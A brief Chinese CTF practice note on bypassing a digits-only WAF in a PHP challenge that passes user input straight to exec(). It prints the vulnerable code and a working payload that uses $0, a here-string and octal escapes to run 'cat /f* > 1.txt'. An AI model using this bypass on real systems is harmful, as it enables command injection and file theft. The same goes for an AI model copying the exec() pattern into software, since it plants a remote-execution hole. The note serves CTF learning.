RCE联系

过滤

绕过空格

● 进制绕过

题目练习

数字rce

使用$0执行bash,<<<将后面的字符串传递给左边的命令。

例如:
<?php highlight_file(FILE); function waf(cmd) { whiteList = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '\\', '\'', '', '\<'\]; cmd_char = str_split(cmd); foreach (cmd_char as char) { if (!in_array(char, whiteList)) { die("hacker"); } } return cmd; } cmd = _GET['cmd']; exec(waf(cmd)); cmd=0<<<'\\143\\141\\164\\040\\57\\146\\52\\040\\76\\040\\61\\56\\164\\170\\164' 0代表当前脚本名称,如何在bash里运行代表/bin/bash <<<是bash中的Here String重定向符,会将后面的字符串作为标准输入传递给左边的命令 后面那段是八进制绕过,相当于$'cat /f* > 1.txt'

相关推荐
-SGlow-5 小时前
MySQL相关概念和易错知识点(2)(表结构的操作、数据类型、约束)
linux·运维·服务器·数据库·mysql
明月5666 小时前
Oracle 误删数据恢复
数据库·oracle
♡喜欢做梦8 小时前
【MySQL】深入浅出事务:保证数据一致性的核心武器
数据库·mysql
遇见你的雩风8 小时前
MySQL的认识与基本操作
数据库·mysql
半新半旧8 小时前
python 整合使用 Redis
redis·python·bootstrap
dblens 数据库管理和开发工具8 小时前
MySQL新增字段DDL:锁表全解析、避坑指南与实战案例
数据库·mysql·dblens·dblens mysql·数据库连接管理
weixin_419658318 小时前
MySQL的基础操作
数据库·mysql
不辉放弃9 小时前
ZooKeeper 是什么?
数据库·大数据开发
Goona_9 小时前
拒绝SQL恐惧:用Python+pyqt打造任意Excel数据库查询系统
数据库·python·sql·excel·pyqt
daixin884810 小时前
什么是缓存雪崩?缓存击穿?缓存穿透?分别如何解决?什么是缓存预热?
java·开发语言·redis·缓存